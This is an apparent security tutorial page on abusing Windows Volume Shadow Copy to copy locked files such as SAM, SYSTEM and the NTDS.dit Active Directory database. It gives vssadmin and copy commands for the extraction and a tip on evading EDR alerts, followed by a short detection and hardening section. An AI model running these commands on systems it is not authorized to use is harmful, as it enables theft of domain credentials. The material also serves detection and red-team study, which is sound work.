User
Intermediate
Verified_Protocol
windows server

Volume Shadow Copy Extraction

"Leveraging VSS to extract sensitive system files and database snapshots from live Windows Server instances."

PopDocs Team
May 2, 2026
10 MIN

Volume Shadow Copy (VSS) Extraction

Volume Shadow Copy Service (VSS) is a technology included in Microsoft Windows that allows taking manual or automatic backup copies or snapshots of computer files or volumes, even when they are in use.

The Attacker's Perspective

VSS is a goldmine for attackers because it allows them to copy files that are normally locked by the operating system, such as:

  • SAM and SYSTEM hives.
  • NTDS.dit (Active Directory Database).
  • Locked log files.

Extraction Methodology

Using vssadmin

The built-in vssadmin tool is the most common way to interact with shadow copies.

powershell
# Create a new shadow copy of the C drive
vssadmin create shadow /for=C:

# List existing shadow copies
vssadmin list shadows

Accessing the Snapshot

Once a shadow copy is created, it can be accessed via its global root path.

powershell
# Copy the NTDS.dit from the shadow copy
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit

!TIP Using vssadmin often triggers EDR alerts. Consider using more stealthy methods like ntdsutil or raw disk access if possible.

Detecting VSS Abuse

Defenders should monitor for:

  1. vssadmin Execution: Especially with create shadow or delete shadows arguments.
  2. Unauthorized access to GLOBALROOT: Accessing volume shadow copy device paths.
  3. Volume Creation Events: Event ID 7036 or similar VSS service start/stop events.

Best Practices

  • Restrict Local Admin: VSS operations require high privileges. Limiting who has local admin rights is the first line of defense.
  • Audit Backup Operations: Ensure only authorized backup software is interacting with VSS.
End_Of_Protocol
EOF_0xCE810C.5CD8E8C